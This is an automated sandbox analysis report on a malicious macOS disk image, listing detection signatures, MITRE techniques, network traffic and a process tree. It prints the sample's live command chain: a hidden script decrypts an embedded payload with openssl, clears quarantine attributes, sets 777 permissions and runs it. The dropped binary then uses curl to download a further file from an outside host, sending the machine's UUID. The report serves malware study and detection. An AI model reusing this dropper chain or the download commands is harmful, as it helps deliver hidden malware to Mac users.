Play interactive tour

Edit tour

Analysis Report G0Sr0fA5cv.dmg

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	102473
Start date:	14.05.2020
Start time:	11:20:22
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	G0Sr0fA5cv.dmg
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Detection:	MAL
Classification:	mal56.evad.macDMG@0/10@1/0
Warnings:	Show All Excluded IPs from analysis (whitelisted): 17.253.54.253, 17.253.54.251, 17.253.108.125, 17.253.54.125, 17.253.108.253 Excluded domains from analysis (whitelisted): time-macos.apple.com, time-osx.g.aaplimg.com

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	56	0 - 100	Report FP / FN	false

Classification Spiderchart

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command-Line Interface11	Hidden Files and Directories1	Port Monitors	Hidden Files and Directories1	Credential Dumping	Virtualization/Sandbox Evasion1	Remote File Copy3	Data from Local System	Data Encrypted11	Standard Non-Application Layer Protocol3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Scripting11	Port Monitors	Accessibility Features	Virtualization/Sandbox Evasion1	Network Sniffing	Security Software Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Windows Management Instrumentation	Accessibility Features	Path Interception	Scripting11	Input Capture	System Information Discovery71	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Remote File Copy3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Signature Overview

Click to jump to signature section

Cryptography:

Encrypts data with the "openssl" command

Show sources

Source: /bin/bash (PID: 18843)	Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ			Jump to behavior
Source: /bin/bash (PID: 18849)	Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2			Jump to behavior

Executes the "openssl" command used for cryptographic operations

Show sources

Source: /bin/bash (PID: 18843)	Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ			Jump to behavior
Source: /bin/bash (PID: 18849)	Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2			Jump to behavior

Networking:

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: /
Source: global traffic	HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: /
Source: global traffic	HTTP traffic detected: GET /sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1 HTTP/1.0Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: /
Source: global traffic	HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: /

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: d1wkiebwu8q7qk.cloudfront.net

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1245Connection: closeCache-Control: no-cache, no-storePragma: no-cacheExpires: -1Server: Microsoft-IIS/7.5Access-Control-Allow-Origin: *X-AspNet-Version: 4.0.30319p3p: CP="CAO PSA OUR"Date: Thu, 14 May 2020 09:21:12 GMTX-Cache: Error from cloudfrontVia: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA2-C2X-Amz-Cf-Id: QTqhiTeBI0MnpH6TE-ieuK0urxyObER7GaCgBzr4TxQ9ixi25rXZbg==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69

Urls found in memory or binary data

Show sources

Source: G0Sr0fA5cv.dmg

String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal56.evad.macDMG@0/10@1/0

Persistence and Installation Behavior:

Executes hidden files

Show sources

Source: /bin/bash (PID: 18828)

File in hidden directory executed: /Volumes/Install/.hidden/Install.command /Volumes/Install/.hidden/Install.command

Jump to behavior

Sets full permissions to files and/or directories

Show sources

Source: /bin/bash (PID: 18852)

Chmod executable with 777: /bin/chmod -> chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2

Jump to behavior

Terminates several processes with shell command 'killall'

Show sources

Source: /bin/bash (PID: 18845)

Killall command executed: killall Terminal

Jump to behavior

Executes commands using a shell command-line interpreter

Show sources

Source: /usr/bin/nohup (PID: 18844)	Shell command executed: /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c system_profiler SPHardwareDataType \| awk '/UUID/ { print $3 }'	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c for FILE in /Volumes/Install/.hidden/*.command do echo '${FILE}' break done	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c hdiutil info -plist \| perl -0777pe 's\|<data>\s(.?)\s*</data>\|<string>$1</string>\|gs' \| plutil -convert json -r -o - -- -	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1' > /dev/null 2>&1	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1' > /dev/null 2>&1	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C 'http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1' > /dev/null 2>&1	Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)	Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1' > /dev/null 2>&1	Jump to behavior

Executes the "chmod" command used to modify permissions

Show sources

Source: /bin/bash (PID: 18852)

Chmod executable: /bin/chmod -> chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2

Jump to behavior

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Show sources

Source: /bin/sh (PID: 18865)	Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1	Jump to behavior
Source: /bin/sh (PID: 18867)	Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1	Jump to behavior
Source: /bin/sh (PID: 18869)	Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1	Jump to behavior
Source: /bin/sh (PID: 18871)	Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1	Jump to behavior

Executes the "grep" command used to find patterns in files or piped streams

Show sources

Source: /bin/bash (PID: 18835)

Grep executable: /usr/bin/grep -> grep -Ev \.(command)$

Jump to behavior

Executes the "mkdir" command used to create folders

Show sources

Source: /bin/bash (PID: 18825)

Mkdir executable: /bin/mkdir -> mkdir -m 700 -p /Users/ben/.bash_sessions

Jump to behavior

Executes the "mktemp" command used to create a temporary unique file name

Show sources

Source: /bin/bash (PID: 18832)

Mktemp executable: /usr/bin/mktemp -> mktemp -d /tmp/XXXXXXXXXXXX

Jump to behavior

Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed

Show sources

Source: /bin/bash (PID: 18844)

Nohup executable: /usr/bin/nohup -> nohup /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'

Jump to behavior

Executes the "touch" command used to create files or modify time stamps

Show sources

Source: /bin/bash (PID: 18827)

Touch executable: /usr/bin/touch -> /usr/bin/touch /Users/ben/.bash_sessions/6191FB1D-2813-41DB-BF02-7C8C726DDB8A.historynew

Jump to behavior

Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)

Show sources

Source: /bin/sh (PID: 18854)	Shell process: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion	Jump to behavior
Source: /bin/sh (PID: 18856)	Shell process: system_profiler SPHardwareDataType	Jump to behavior
Source: /bin/sh (PID: 18857)	Shell process: awk /UUID/ { print $3 }	Jump to behavior
Source: /bin/sh (PID: 18861)	Shell process: hdiutil info -plist	Jump to behavior
Source: /bin/sh (PID: 18862)	Shell process: perl -0777pe s\|<data>\s(.?)\s*</data>\|<string>$1</string>\|gs	Jump to behavior
Source: /bin/sh (PID: 18863)	Shell process: plutil -convert json -r -o - -- -	Jump to behavior
Source: /bin/sh (PID: 18865)	Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1	Jump to behavior
Source: /bin/sh (PID: 18867)	Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1	Jump to behavior
Source: /bin/sh (PID: 18869)	Shell process: curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1	Jump to behavior
Source: /bin/sh (PID: 18871)	Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1	Jump to behavior

Queries for attached disk images with shell command 'hdiutil'

Show sources

Source: /bin/sh (PID: 18861)

Hdiutil command executed: hdiutil info -plist

Jump to behavior

Writes 64-bit Mach-O files to disk

Show sources

Source: /usr/bin/openssl (PID: 18849)

File written: /private/tmp/oVlTmrVXYMfG/Qqsz1P2

Jump to dropped file

Writes Mach-O files to the tmp directory

Show sources

Source: /usr/bin/openssl (PID: 18849)

64-bit Mach-O written to tmp path: /private/tmp/oVlTmrVXYMfG/Qqsz1P2

Jump to dropped file

Executes the "awk" command used to scan for patterns (typically in standard output)

Show sources

Source: /bin/sh (PID: 18857)

Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }

Jump to behavior

Reads data from the local random generator

Show sources

Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)	Random device file read: /dev/urandom			Jump to behavior
Source: /usr/bin/perl5.18 (PID: 18862)	Random device file read: /dev/urandom			Jump to behavior

Uses the Python framework

Show sources

Source: /usr/bin/xattr (PID: 18851)

Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python

Jump to behavior

Malware Analysis System Evasion:

Reads the sysctl hardware model value (might be used for detecting VM presence)

Show sources

Source: /usr/sbin/system_profiler (PID: 18858)

Sysctl read request: hw.model (6.2)

Jump to behavior

Language, Device and Operating System Detection:

Queries the macOS product version

Show sources

Source: /bin/sh (PID: 18854)

Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Jump to behavior

Reads hardware related sysctl values

Show sources

Source: /usr/sbin/system_profiler (PID: 18858)	Sysctl read request: hw.cpu_freq (6.15)			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 18858)	Sysctl read request: hw.memsize (6.24)			Jump to behavior

Reads the systems OS release and/or type

Show sources

Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)	Sysctl requested: kern.ostype (1.1)			Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)	Sysctl requested: kern.osrelease (1.2)			Jump to behavior

Reads the systems hostname

Show sources

Source: /bin/bash (PID: 18822)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /Volumes/Install/.hidden/Install.command (PID: 18828)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 18844)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18854)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18855)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18859)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18860)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18864)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18866)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18868)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 18870)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Reads the system or server version plist file

Show sources

Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Executes the "defaults" command used to read or modify user specific settings

Show sources

Source: /bin/sh (PID: 18854)

Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Jump to behavior

Stealing of Sensitive Information:

Executes the "system_profiler" command used to collect detailed system hardware and software information

Show sources

Source: /bin/sh (PID: 18856)	System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 18856)	System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full			Jump to behavior

Malware Configuration

No configs have been found

Runtime Messages

Command:	open "/Volumes/Install/Install" --args
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
13.225.73.108	f_000418.exe	Get hash	malicious	Browse
13.225.73.108	https://download.filezilla-project.org/client/FileZilla_3.47.2.1_win64_sponsored-setup.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	1735330053H319815.xls	Get hash	malicious	Browse	84.38.182.31
	salt-minions	Get hash	malicious	Browse	45.143.92.106
	adsasdasd.exe	Get hash	malicious	Browse	127.0.0.1
	http://donnercompanies.net/security.php	Get hash	malicious	Browse	35.209.19.195
	Rla_5097.xls	Get hash	malicious	Browse	94.182.190.148
	Rla_5097.xls	Get hash	malicious	Browse	94.182.190.148
	Invoice-3681694.xls	Get hash	malicious	Browse	104.27.178.167
	Invoice-3681694.xls	Get hash	malicious	Browse	104.27.179.167
	2qPQnD5vHRDNTnC2KqNdtNXqcQrEJrNR.exe	Get hash	malicious	Browse	23.95.85.123
	3hhWwWWq4x.dll	Get hash	malicious	Browse	151.101.2.49
	https://www.alternativaprintjet.com.br/xyzito45/Uforaxsfx65gomn/xfschdonsingo/pishakayan/kp64a7jmihcs9wrn0oevzub1gf5xd32lqy8tonl02rximgeb1zf9tcv637qws5jp8ydhuk4a29j4zbutlhdkps38fn10ywo7mexcqv6g5rai?data=bWFudWVsLmFtYnJpekB2dWVsaW5nLmNvbQ==	Get hash	malicious	Browse	177.10.165.125
	http://konnoryo.com/hta/?email=pavan.kumar@123test.com	Get hash	malicious	Browse	202.254.238.5
	processhacker-2.39-setup.exe	Get hash	malicious	Browse	162.243.25.33
	processhacker-2.39-setup.exe	Get hash	malicious	Browse	162.243.25.33
	processhacker-2.39-setup.exe	Get hash	malicious	Browse	162.243.25.33
	processhacker-2.39-setup.exe	Get hash	malicious	Browse	162.243.25.33
	Locky.exe	Get hash	malicious	Browse	86.104.134.144
	https://www.inter-health.com.au/wp-admin/css/index.php?email=mail@australianballet.com.au&data=02\|01\|mail@australianballet.com.au\|2687c41444fd4d8d0a6508d7f7cf35e1\|363ab79152b7474a91175bf36bde2b94\|0\|0\|637250341744488099&sdata=6BQDV95b3b9Ro5HKEpjOLcgyx5i4cHADmo3Ctc6lmhU=&reserved=0	Get hash	malicious	Browse	52.62.233.197
	Rha5238.xls	Get hash	malicious	Browse	94.182.190.148
	info-1205-3833314.xls	Get hash	malicious	Browse	104.27.178.167

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

system is mac-mojave

Terminal New Fork (PID: 18821, Parent: 321)

bash (MD5: 0313fd399b143fc40cd52a1679018305) Arguments: -bash

bash New Fork (PID: 18823, Parent: 18822)

bash New Fork (PID: 18824, Parent: 18823)

path_helper (MD5: 0403286476d3e8908d852969c2188790) Arguments: /usr/libexec/path_helper -s

bash New Fork (PID: 18825, Parent: 18822)

mkdir (MD5: 0948c3e8dfd7f3d3628ca8b819092ccf) Arguments: mkdir -m 700 -p /Users/ben/.bash_sessions

bash New Fork (PID: 18826, Parent: 18822)

bash New Fork (PID: 18827, Parent: 18826)

touch (MD5: b1fc3a8e0ae32021b9f29be4ff196129) Arguments: /usr/bin/touch /Users/ben/.bash_sessions/6191FB1D-2813-41DB-BF02-7C8C726DDB8A.historynew

bash New Fork (PID: 18828, Parent: 18822)

Install.command (MD5: 8c4fec6999a5a16bc1936b3ce6e3175a) Arguments: /Volumes/Install/.hidden/Install.command

bash New Fork (PID: 18829, Parent: 18828)

bash New Fork (PID: 18830, Parent: 18829)

bash New Fork (PID: 18831, Parent: 18830)

dirname (MD5: 6c2a99249cf9eefc79be8dc17bcc5758) Arguments: dirname /Volumes/Install/.hidden/Install.command

bash New Fork (PID: 18832, Parent: 18828)

mktemp (MD5: 295fb8cee272a251f798cc4b1a713251) Arguments: mktemp -d /tmp/XXXXXXXXXXXX

bash New Fork (PID: 18833, Parent: 18828)

bash New Fork (PID: 18834, Parent: 18833)

ls (MD5: 7d44a2a25ece071c8da220e1839715e8) Arguments: ls

bash New Fork (PID: 18835, Parent: 18833)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep -Ev \.(command)$

bash New Fork (PID: 18836, Parent: 18833)

head (MD5: 7eb86b67c22621269bd71427f398ffa1) Arguments: head -n 1

bash New Fork (PID: 18837, Parent: 18833)

rev (MD5: d26c1bcf64f51f57d779a7d8d924ff6b) Arguments: rev

bash New Fork (PID: 18838, Parent: 18828)

bash New Fork (PID: 18839, Parent: 18838)

bash New Fork (PID: 18840, Parent: 18838)

rev (MD5: d26c1bcf64f51f57d779a7d8d924ff6b) Arguments: rev

bash New Fork (PID: 18841, Parent: 18828)

bash New Fork (PID: 18842, Parent: 18841)

bash New Fork (PID: 18843, Parent: 18841)

openssl (MD5: f123a727dfcee710d520f7b112f07f04) Arguments: openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ

bash New Fork (PID: 18844, Parent: 18828)

nohup (MD5: 05e181cb915d336de670a1fcad509435) Arguments: nohup /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'

bash (MD5: 0313fd399b143fc40cd52a1679018305) Arguments: /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'

bash New Fork (PID: 18846, Parent: 18844)

bash New Fork (PID: 18849, Parent: 18844)

openssl (MD5: f123a727dfcee710d520f7b112f07f04) Arguments: openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2

bash New Fork (PID: 18851, Parent: 18844)

xattr (MD5: e2ca6555fe4b8c6a97d1ced2156c9b69) Arguments: xattr -c /tmp/oVlTmrVXYMfG/Qqsz1P2

Python (MD5: 7058b515356cdcf3fada0e8d34926c7d) Arguments: /usr/bin/python /usr/bin/xattr-2.7 -c /tmp/oVlTmrVXYMfG/Qqsz1P2

bash New Fork (PID: 18852, Parent: 18844)

chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2

bash New Fork (PID: 18853, Parent: 18844)

Qqsz1P2 (MD5: 38a84a69b3419f5ae798b64052fe6f7d) Arguments: /tmp/oVlTmrVXYMfG/Qqsz1P2

sh New Fork (PID: 18854, Parent: 18853)

defaults (MD5: 36a61540ce99d6c9303a62405fea340f) Arguments: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

sh New Fork (PID: 18855, Parent: 18853)

sh New Fork (PID: 18856, Parent: 18855)

system_profiler (MD5: de1aa7b1e123ef5ba1b076a085bbcece) Arguments: system_profiler SPHardwareDataType

system_profiler New Fork (PID: 18858, Parent: 18856)

sh New Fork (PID: 18857, Parent: 18855)

awk (MD5: 434e28a3f230b6e0b1e8ff5637213759) Arguments: awk /UUID/ { print $3 }

sh New Fork (PID: 18859, Parent: 18853)

sh New Fork (PID: 18860, Parent: 18853)

sh New Fork (PID: 18861, Parent: 18860)

hdiutil (MD5: 6a08ca12fec7ff0315356432b8cfe31b) Arguments: hdiutil info -plist

sh New Fork (PID: 18862, Parent: 18860)

perl (MD5: af70985160b8e3f7b57fde159665e36c) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs

perl5.18 (MD5: 18ce3464a277a0f79a21935a03f1f9d5) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs

